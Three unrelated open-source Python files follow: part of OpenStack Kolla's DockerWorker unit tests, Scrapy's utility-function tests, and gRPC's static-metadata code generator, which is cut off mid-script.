'auth_email': 'fake_mail@foogle.com'
})
self.dw.dc.pull.return_value = [
b'{"status":"Pull complete","progressDetail":{},"id":"22f7"}\r\n',
b'{"status":"Digest: sha256:47c3bdbcf99f0c1a36e4db"}\r\n',
b'{"status":"Downloaded newer image for ubuntu:16.04"}\r\n'
]
self.dw.dc.images.side_effect = [
[],
['sha256:47c3bdbcf99f0c1a36e4db']
]
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertTrue(self.dw.changed)
def test_pull_image_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.pull.return_value = [
b'{"status":"Pull complete","progressDetail":{},"id":"22f7"}\r\n',
b'{"status":"Digest: sha256:47c3bdbf0c1a36e4db"}\r\n',
b'{"status":"mage is up to date for ubuntu:16.04"}\r\n'
]
self.dw.dc.images.side_effect = [
['sha256:47c3bdbcf99f0c1a36e4db'],
['sha256:47c3bdbcf99f0c1a36e4db']
]
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
def test_pull_image_not_exists(self):
self.dw = get_DockerWorker(
{'image': 'unknown:16.04'})
self.dw.dc.pull.return_value = [
b'{"error": "image unknown not found"}\r\n']
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='unknown',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="The requested image does not exist: unknown:16.04",
failed=True)
def test_pull_image_error(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.pull.return_value = [
b'{"error": "unexpected error"}\r\n']
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="Unknown error message: unexpected error",
failed=True)
class TestVolume(base.BaseTestCase):
def setUp(self):
super(TestVolume, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
self.volumes = {
'Volumes':
[{'Driver': u'local',
'Labels': None,
'Mountpoint': '/var/lib/docker/volumes/nova_compute/_data',
'Name': 'nova_compute'},
{'Driver': 'local',
'Labels': None,
'Mountpoint': '/var/lib/docker/volumes/mariadb/_data',
'Name': 'mariadb'}]
}
def test_create_volume(self):
self.dw = get_DockerWorker({'name': 'rabbitmq',
'action': 'create_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.create_volume()
self.dw.dc.volumes.assert_called_once_with()
self.assertTrue(self.dw.changed)
self.dw.dc.create_volume.assert_called_once_with(
name='rabbitmq',
driver='local')
def test_create_volume_exists(self):
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'create_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.create_volume()
self.dw.dc.volumes.assert_called_once_with()
self.assertFalse(self.dw.changed)
def test_remove_volume(self):
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.remove_volume()
self.assertTrue(self.dw.changed)
self.dw.dc.remove_volume.assert_called_once_with(name='nova_compute')
def test_remove_volume_not_exists(self):
self.dw = get_DockerWorker({'name': 'rabbitmq',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.remove_volume()
self.assertFalse(self.dw.changed)
def test_remove_volume_exception(self):
resp = mock.MagicMock()
resp.status_code = 409
docker_except = docker_error.APIError('test error', resp)
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.dc.remove_volume.side_effect = docker_except
self.assertRaises(docker_error.APIError, self.dw.remove_volume)
self.assertTrue(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
failed=True,
msg="Volume named 'nova_compute' is currently in-use"
)
class TestAttrComp(base.BaseTestCase):
def setUp(self):
super(TestAttrComp, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_compare_cap_add_neg(self):
container_info = {'HostConfig': dict(CapAdd=['data'])}
self.dw = get_DockerWorker({'cap_add': ['data']})
self.assertFalse(self.dw.compare_cap_add(container_info))
def test_compare_cap_add_pos(self):
container_info = {'HostConfig': dict(CapAdd=['data1'])}
self.dw = get_DockerWorker({'cap_add': ['data2']})
self.assertTrue(self.dw.compare_cap_add(container_info))
def test_compare_ipc_mode_neg(self):
container_info = {'HostConfig': dict(IpcMode='data')}
self.dw = get_DockerWorker({'ipc_mode': 'data'})
self.assertFalse(self.dw.compare_ipc_mode(container_info))
def test_compare_ipc_mode_pos(self):
container_info = {'HostConfig': dict(IpcMode='data1')}
self.dw = get_DockerWorker({'ipc_mode': 'data2'})
self.assertTrue(self.dw.compare_ipc_mode(container_info))
def test_compare_security_opt_neg(self):
container_info = {'HostConfig': dict(SecurityOpt=['data'])}
self.dw = get_DockerWorker({'security_opt': ['data']})
self.assertFalse(self.dw.compare_security_opt(container_info))
def test_compare_security_opt_pos(self):
container_info = {'HostConfig': dict(SecurityOpt=['data1'])}
self.dw = get_DockerWorker({'security_opt': ['data2']})
self.assertTrue(self.dw.compare_security_opt(container_info))
def test_compare_pid_mode_neg(self):
container_info = {'HostConfig': dict(PidMode='host')}
self.dw = get_DockerWorker({'pid_mode': 'host'})
self.assertFalse(self.dw.compare_pid_mode(container_info))
def test_compare_pid_mode_pos(self):
container_info = {'HostConfig': dict(PidMode='host1')}
self.dw = get_DockerWorker({'pid_mode': 'host2'})
self.assertTrue(self.dw.compare_pid_mode(container_info))
def test_compare_privileged_neg(self):
container_info = {'HostConfig': dict(Privileged=True)}
self.dw = get_DockerWorker({'privileged': True})
self.assertFalse(self.dw.compare_privileged(container_info))
def test_compare_privileged_pos(self):
container_info = {'HostConfig': dict(Privileged=True)}
self.dw = get_DockerWorker({'privileged': False})
self.assertTrue(self.dw.compare_privileged(container_info))
def test_compare_labels_neg(self):
container_info = {'Config': dict(Labels={'kolla_version': '2.0.1'})}
self.dw = get_DockerWorker({'labels': {'kolla_version': '2.0.1'}})
self.dw.check_image = mock.MagicMock(return_value=dict(
Labels={'kolla_version': '2.0.1'}))
self.assertFalse(self.dw.compare_labels(container_info))
def test_compare_labels_pos(self):
container_info = {'Config': dict(Labels={'kolla_version': '1.0.1'})}
self.dw = get_DockerWorker({'labels': {'kolla_version': '2.0.1'}})
self.dw.check_image = mock.MagicMock(return_value=dict(
Labels={'kolla_version': '1.0.1'}))
self.assertTrue(self.dw.compare_labels(container_info))
def test_compare_volumes_from_neg(self):
container_info = {'HostConfig': dict(VolumesFrom=['777f7dc92da7'])}
self.dw = get_DockerWorker({'volumes_from': ['777f7dc92da7']})
self.assertFalse(self.dw.compare_volumes_from(container_info))
def test_compare_volumes_from_post(self):
container_info = {'HostConfig': dict(VolumesFrom=['777f7dc92da7'])}
self.dw = get_DockerWorker({'volumes_from': ['ba8c0c54f0f2']})
self.assertTrue(self.dw.compare_volumes_from(container_info))
def test_compare_volumes_neg(self):
container_info = {
'Config': dict(Volumes=['/var/log/kolla/']),
'HostConfig': dict(Binds=['kolla_logs:/var/log/kolla/:rw'])}
self.dw = get_DockerWorker(
{'volumes': ['kolla_logs:/var/log/kolla/:rw']})
self.assertFalse(self.dw.compare_volumes(container_info))
def test_compare_volumes_pos(self):
container_info = {
'Config': dict(Volumes=['/var/log/kolla/']),
'HostConfig': dict(Binds=['kolla_logs:/var/log/kolla/:rw'])}
self.dw = get_DockerWorker(
{'volumes': ['/dev/:/dev/:rw']})
self.assertTrue(self.dw.compare_volumes(container_info))
def test_compare_environment_neg(self):
container_info = {'Config': dict(
Env=['KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary']
)}
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS',
KOLLA_BASE_DISTRO='ubuntu',
KOLLA_INSTALL_TYPE='binary')})
self.assertFalse(self.dw.compare_environment(container_info))
def test_compare_environment_pos(self):
container_info = {'Config': dict(
Env=['KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary']
)}
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS',
KOLLA_BASE_DISTRO='centos',
KOLLA_INSTALL_TYPE='binary')})
self.assertTrue(self.dw.compare_environment(container_info))
def test_compare_container_state_neg(self):
container_info = {'State': dict(Status='running')}
self.dw = get_DockerWorker({'state': 'running'})
self.assertFalse(self.dw.compare_container_state(container_info))
def test_compare_container_state_pos(self):
container_info = {'State': dict(Status='running')}
self.dw = get_DockerWorker({'state': 'exited'})
self.assertTrue(self.dw.compare_container_state(container_info))
|
|
import functools
import gc
import operator
import platform
import unittest
from itertools import count
from warnings import catch_warnings
from scrapy.utils.python import (
memoizemethod_noargs, binary_is_text, equal_attributes,
WeakKeyCache, get_func_args, to_bytes, to_unicode,
without_none_values, MutableChain)
__doctests__ = ['scrapy.utils.python']
class MutableChainTest(unittest.TestCase):
def test_mutablechain(self):
m = MutableChain(range(2), [2, 3], (4, 5))
m.extend(range(6, 7))
m.extend([7, 8])
m.extend([9, 10], (11, 12))
self.assertEqual(next(m), 0)
self.assertEqual(m.__next__(), 1)
with catch_warnings(record=True) as warnings:
self.assertEqual(m.next(), 2)
self.assertEqual(len(warnings), 1)
self.assertIn('scrapy.utils.python.MutableChain.__next__',
str(warnings[0].message))
self.assertEqual(list(m), list(range(3, 13)))
class ToUnicodeTest(unittest.TestCase):
def test_converting_an_utf8_encoded_string_to_unicode(self):
self.assertEqual(to_unicode(b'lel\xc3\xb1e'), u'lel\xf1e')
def test_converting_a_latin_1_encoded_string_to_unicode(self):
self.assertEqual(to_unicode(b'lel\xf1e', 'latin-1'), u'lel\xf1e')
def test_converting_a_unicode_to_unicode_should_return_the_same_object(self):
self.assertEqual(to_unicode(u'\xf1e\xf1e\xf1e'), u'\xf1e\xf1e\xf1e')
def test_converting_a_strange_object_should_raise_TypeError(self):
self.assertRaises(TypeError, to_unicode, 423)
def test_errors_argument(self):
self.assertEqual(
to_unicode(b'a\xedb', 'utf-8', errors='replace'),
u'a\ufffdb'
)
class ToBytesTest(unittest.TestCase):
def test_converting_a_unicode_object_to_an_utf_8_encoded_string(self):
self.assertEqual(to_bytes(u'\xa3 49'), b'\xc2\xa3 49')
def test_converting_a_unicode_object_to_a_latin_1_encoded_string(self):
self.assertEqual(to_bytes(u'\xa3 49', 'latin-1'), b'\xa3 49')
def test_converting_a_regular_bytes_to_bytes_should_return_the_same_object(self):
self.assertEqual(to_bytes(b'lel\xf1e'), b'lel\xf1e')
def test_converting_a_strange_object_should_raise_TypeError(self):
self.assertRaises(TypeError, to_bytes, unittest)
def test_errors_argument(self):
self.assertEqual(
to_bytes(u'a\ufffdb', 'latin-1', errors='replace'),
b'a?b'
)
class MemoizedMethodTest(unittest.TestCase):
def test_memoizemethod_noargs(self):
class A(object):
@memoizemethod_noargs
def cached(self):
return object()
def noncached(self):
return object()
a = A()
one = a.cached()
two = a.cached()
three = a.noncached()
assert one is two
assert one is not three
class BinaryIsTextTest(unittest.TestCase):
def test_binaryistext(self):
assert binary_is_text(b"hello")
def test_utf_16_strings_contain_null_bytes(self):
assert binary_is_text(u"hello".encode('utf-16'))
def test_one_with_encoding(self):
assert binary_is_text(b"<div>Price \xa3</div>")
def test_real_binary_bytes(self):
assert not binary_is_text(b"\x02\xa3")
class UtilsPythonTestCase(unittest.TestCase):
def test_equal_attributes(self):
class Obj:
pass
a = Obj()
b = Obj()
# no attributes given return False
self.assertFalse(equal_attributes(a, b, []))
# not existent attributes
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
a.x = 1
b.x = 1
# equal attribute
self.assertTrue(equal_attributes(a, b, ['x']))
b.y = 2
# obj1 has no attribute y
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
a.y = 2
# equal attributes
self.assertTrue(equal_attributes(a, b, ['x', 'y']))
a.y = 1
# differente attributes
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
# test callable
a.meta = {}
b.meta = {}
self.assertTrue(equal_attributes(a, b, ['meta']))
# compare ['meta']['a']
a.meta['z'] = 1
b.meta['z'] = 1
get_z = operator.itemgetter('z')
get_meta = operator.attrgetter('meta')
compare_z = lambda obj: get_z(get_meta(obj))
self.assertTrue(equal_attributes(a, b, [compare_z, 'x']))
# fail z equality
a.meta['z'] = 2
self.assertFalse(equal_attributes(a, b, [compare_z, 'x']))
def test_weakkeycache(self):
class _Weakme(object): pass
_values = count()
wk = WeakKeyCache(lambda k: next(_values))
k = _Weakme()
v = wk[k]
self.assertEqual(v, wk[k])
self.assertNotEqual(v, wk[_Weakme()])
self.assertEqual(v, wk[k])
del k
for _ in range(100):
if wk._weakdict:
gc.collect()
self.assertFalse(len(wk._weakdict))
def test_get_func_args(self):
def f1(a, b, c):
pass
def f2(a, b=None, c=None):
pass
class A(object):
def __init__(self, a, b, c):
pass
def method(self, a, b, c):
pass
class Callable(object):
def __call__(self, a, b, c):
pass
a = A(1, 2, 3)
cal = Callable()
partial_f1 = functools.partial(f1, None)
partial_f2 = functools.partial(f1, b=None)
partial_f3 = functools.partial(partial_f2, None)
self.assertEqual(get_func_args(f1), ['a', 'b', 'c'])
self.assertEqual(get_func_args(f2), ['a', 'b', 'c'])
self.assertEqual(get_func_args(A), ['a', 'b', 'c'])
self.assertEqual(get_func_args(a.method), ['a', 'b', 'c'])
self.assertEqual(get_func_args(partial_f1), ['b', 'c'])
self.assertEqual(get_func_args(partial_f2), ['a', 'c'])
self.assertEqual(get_func_args(partial_f3), ['c'])
self.assertEqual(get_func_args(cal), ['a', 'b', 'c'])
self.assertEqual(get_func_args(object), [])
if platform.python_implementation() == 'CPython':
# TODO: how do we fix this to return the actual argument names?
self.assertEqual(get_func_args(str.split), [])
self.assertEqual(get_func_args(" ".join), [])
self.assertEqual(get_func_args(operator.itemgetter(2)), [])
else:
self.assertEqual(
get_func_args(str.split, stripself=True), ['sep', 'maxsplit'])
self.assertEqual(get_func_args(" ".join, stripself=True), ['list'])
self.assertEqual(
get_func_args(operator.itemgetter(2), stripself=True), ['obj'])
def test_without_none_values(self):
self.assertEqual(without_none_values([1, None, 3, 4]), [1, 3, 4])
self.assertEqual(without_none_values((1, None, 3, 4)), (1, 3, 4))
self.assertEqual(
without_none_values({'one': 1, 'none': None, 'three': 3, 'four': 4}),
{'one': 1, 'three': 3, 'four': 4})
if __name__ == "__main__":
unittest.main()
|
|
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
# Configuration: a list of either strings or 2-tuples of strings.
# A single string represents a static grpc_mdstr.
# A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will
# also be created).
# The list of 2-tuples must begin with the static hpack table elements as
# defined by RFC 7541 and be in the same order because of an hpack encoding
# performance optimization that relies on this. If you want to change this, then
# you must change the implementation of the encoding optimization as well.
CONFIG = [
# metadata strings
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
'x-endpoint-load-metrics-bin',
# channel arg keys
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
# well known method names
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
'/envoy.service.load_stats.v2.LoadReportingService/StreamLoadStats',
'/envoy.service.load_stats.v3.LoadReportingService/StreamLoadStats',
'/grpc.health.v1.Health/Watch',
'/envoy.service.discovery.v2.AggregatedDiscoveryService/StreamAggregatedResources',
'/envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources',
# compression algorithm names
'deflate',
'gzip',
'stream/gzip',
# metadata elements
# begin hpack static elements
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
# end hpack static elements
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-cost-bin', ''),
]
# All entries here are ignored when counting non-default initial metadata that
# prevents the chttp2 server from sending a Trailers-Only response.
METADATA_BATCH_CALLOUTS = [
':path',
':method',
':status',
':authority',
':scheme',
'te',
'grpc-message',
'grpc-status',
'grpc-payload-bin',
'grpc-encoding',
'grpc-accept-encoding',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'content-type',
'content-encoding',
'accept-encoding',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'user-agent',
'host',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'x-endpoint-load-metrics-bin',
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
# utility: mangle the name of a config
def mangle(elem, name=None):
xl = {
'-': '_',
':': '',
'/': 'slash',
'.': 'dot',
',': 'comma',
' ': '_',
}
def m0(x):
if not x:
return 'empty'
r = ''
for c in x:
put = xl.get(c, c.lower())
if not put:
continue
last_is_underscore = r[-1] == '_' if r else True
if last_is_underscore and put == '_':
continue
elif len(put) > 1:
if not last_is_underscore:
r += '_'
r += put
r += '_'
else:
r += put
if r[-1] == '_':
r = r[:-1]
return r
def n(default, name=name):
if name is None:
return 'grpc_%s_' % default
if name == '':
return ''
return 'grpc_%s_' % name
if isinstance(elem, tuple):
return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1]))
else:
return '%s%s' % (n('mdstr'), m0(elem))
# utility: generate some hash value for a string
def fake_hash(elem):
return hashlib.md5(elem).hexdigest()[0:8]
# utility: print a big comment block into a set of files
def put_banner(files, banner):
for f in files:
print >> f, '/*'
for line in banner:
print >> f, ' * %s' % line
print >> f, ' */'
print >> f
# build a list of all the strings we need
all_strs = list()
all_elems = list()
static_userdata = {}
# put metadata batch callouts first, to make the check of if a static metadata
# string is a callout trivial
for elem in METADATA_BATCH_CALLOUTS:
if elem not in all_strs:
all_strs.append(elem)
for elem in CONFIG:
if isinstance(elem, tuple):
if elem[0] not in all_strs:
all_strs.append(elem[0])
if elem[1] not in all_strs:
all_strs.append(elem[1])
if elem not in all_elems:
all_elems.append(elem)
else:
if elem not in all_strs:
all_strs.append(elem)
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
val = ','.join(COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('grpc-accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
stream_compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
# output configuration
args = sys.argv[1:]
H = None
C = None
D = None
if args:
if 'header' in args:
H = sys.stdout
else:
H = open('/dev/null', 'w')
if 'source' in args:
C = sys.stdout
else:
C = open('/dev/null', 'w')
if 'dictionary' in args:
D = sys.stdout
else:
D = open('/dev/null', 'w')
else:
H = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.h'), 'w')
C = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.cc'), 'w')
D = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../test/core/end2end/fuzzers/hpack.dictionary'),
'w')
# copy-paste copyright notice from this file
with open(sys.argv[0]) as my_source:
copyright = []
for line in my_source:
if line[0] != '#':
break
for line in my_source:
if line[0] == '#':
copyright.append(line)
break
for line in my_source:
if line[0] != '#':
break
copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
out = "\""
for c in line:
if 32 <= c < 127:
if c != ord('"'):
out += chr(c)
else:
out += "\\\""
else:
out += '\\x%02X' % c
return out + "\""
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H
print >> H, '#include <grpc/support/port_platform.h>'
print >> H
print >> H, '#include <cstdint>'
print >> H
print >> H, '#include "src/core/lib/transport/metadata.h"'
print >> H
print >> C, '#include <grpc/support/port_platform.h>'
print >> C
print >> C, '#include "src/core/lib/transport/static_metadata.h"'
print >> C
print >> C, '#include "src/core/lib/slice/slice_internal.h"'
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def_for_ctx(i):
return (
'grpc_core::StaticMetadataSlice(&refcounts[%d].base, %d, g_bytes+%d)'
) % (i, len(all_strs[i]), id2strofs[i])
def slice_def(i):
return (
'grpc_core::StaticMetadataSlice(&grpc_static_metadata_refcounts()[%d].base, %d, g_bytes+%d)'
) % (i, len(all_strs[i]), id2strofs[i])
def str_idx(s):
for i, s2 in enumerate(all_strs):
if s == s2:
return i
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
static_slice_dest_assert = (
'static_assert(std::is_trivially_destructible' +
'<grpc_core::StaticMetadataSlice>::value, '
'"grpc_core::StaticMetadataSlice must be trivially destructible.");')
print >> H, static_slice_dest_assert
print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs)
print >> H, '''
void grpc_init_static_metadata_ctx(void);
void grpc_destroy_static_metadata_ctx(void);
namespace grpc_core {
#ifndef NDEBUG
constexpr uint64_t kGrpcStaticMetadataInitCanary = 0xCAFEF00DC0FFEE11L;
uint64_t StaticMetadataInitCanary();
#endif
extern const StaticMetadataSlice* g_static_metadata_slice_table;
}
inline const grpc_core::StaticMetadataSlice* grpc_static_slice_table() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_metadata_slice_table != nullptr);
return grpc_core::g_static_metadata_slice_table;
}
'''
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '#define %s (grpc_static_slice_table()[%d])' % (
mangle(elem).upper(), i)
print >> H
print >> C, 'static constexpr uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> H, '''
namespace grpc_core {
struct StaticSliceRefcount;
extern StaticSliceRefcount* g_static_metadata_slice_refcounts;
}
inline grpc_core::StaticSliceRefcount* grpc_static_metadata_refcounts() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_metadata_slice_refcounts != nullptr);
return grpc_core::g_static_metadata_slice_refcounts;
}
'''
print >> C, 'grpc_slice_refcount grpc_core::StaticSliceRefcount::kStaticSubRefcount;'
print >> C, '''
namespace grpc_core {
struct StaticMetadataCtx {
#ifndef NDEBUG
const uint64_t init_canary = kGrpcStaticMetadataInitCanary;
#endif
StaticSliceRefcount
refcounts[GRPC_STATIC_MDSTR_COUNT] = {
'''
for i, elem in enumerate(all_strs):
print >> C, ' StaticSliceRefcount(%d), ' % i
print >> C, '};' # static slice refcounts
print >> C
print >> C, '''
const StaticMetadataSlice
slices[GRPC_STATIC_MDSTR_COUNT] = {
'''
for i, elem in enumerate(all_strs):
print >> C, slice_def_for_ctx(i) + ','
print >> C, '};' # static slices
print >> C, 'StaticMetadata static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for idx, (a, b) in enumerate(all_elems):
print >> C, 'StaticMetadata(%s,%s, %d),' % (slice_def_for_ctx(
str_idx(a)), slice_def_for_ctx(str_idx(b)), idx)
print >> C, '};' # static_mdelem_table
print >> C, ('''
/* Warning: the core static metadata currently operates under the soft constraint
that the first GRPC_CHTTP2_LAST_STATIC_ENTRY (61) entries must contain
metadata specified by the http2 hpack standard. The CHTTP2 transport reads the
core metadata with this assumption in mind. If the order of the core static
metadata is to be changed, then the CHTTP2 transport must be changed as well to
stop relying on the core metadata. */
''')
print >> C, ('grpc_mdelem '
'static_mdelem_manifested[GRPC_STATIC_MDELEM_COUNT] = {')
print >> C, '// clang-format off'
static_mds = []
for i, elem in enumerate(all_elems):
md_name = mangle(elem).upper()
md_human_readable = '"%s": "%s"' % elem
md_spec = ' /* %s: \n %s */\n' % (md_name, md_human_readable)
md_spec += ' GRPC_MAKE_MDELEM(\n'
md_spec += ((' &static_mdelem_table[%d].data(),\n' % i) +
' GRPC_MDELEM_STORAGE_STATIC)')
static_mds.append(md_spec)
print >> C, ',\n'.join(static_mds)
print >> C, '// clang-format on'
print >> C, ('};') # static_mdelem_manifested
print >> C, '};' # struct StaticMetadataCtx
print >> C, '}' # namespace grpc_core
print >> C, '''
namespace grpc_core {
static StaticMetadataCtx* g_static_metadata_slice_ctx = nullptr;
const StaticMetadataSlice* g_static_metadata_slice_table = nullptr;
StaticSliceRefcount* g_static_metadata_slice_refcounts = nullptr;
StaticMetadata* g_static_mdelem_table = nullptr;
grpc_mdelem* g_static_mdelem_manifested = nullptr;
#ifndef NDEBUG
uint64_t StaticMetadataInitCanary() {
return g_static_metadata_slice_ctx->init_canary;
}
#endif
}
void grpc_init_static_metadata_ctx(void) {
grpc_core::g_static_metadata_slice_ctx
= new grpc_core::StaticMetadataCtx();
grpc_core::g_static_metadata_slice_table
= grpc_core::g_static_metadata_slice_ctx->slices;
grpc_core::g_static_metadata_slice_refcounts
= grpc_core::g_static_metadata_slice_ctx->refcounts;
grpc_core::g_static_mdelem_table
= grpc_core::g_static_metadata_slice_ctx->static_mdelem_table;
grpc_core::g_static_mdelem_manifested =
grpc_core::g_static_metadata_slice_ctx->static_mdelem_manifested;
}
void grpc_destroy_static_metadata_ctx(void) {
delete grpc_core::g_static_metadata_slice_ctx;
grpc_core::g_static_metadata_slice_ctx = nullptr;
grpc_core::g_static_metadata_slice_table = nullptr;
grpc_core::g_static_metadata_slice_refcounts = nullptr;
grpc_core::g_static_mdelem_table = nullptr;
grpc_core::g_static_mdelem_manifested = nullptr;
}
'''
print >> C
print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\'
print >> H, (' ((slice).refcount != NULL && (slice).refcount->GetType() == '
'grpc_slice_refcount::Type::STATIC)')
print >> H
print >> C
print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\'
print >> H, '(reinterpret_cast<grpc_core::StaticSliceRefcount*>((static_slice).refcount)->index)'
print >> H
print >> D, '# hpack fuzzing dictionary'
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
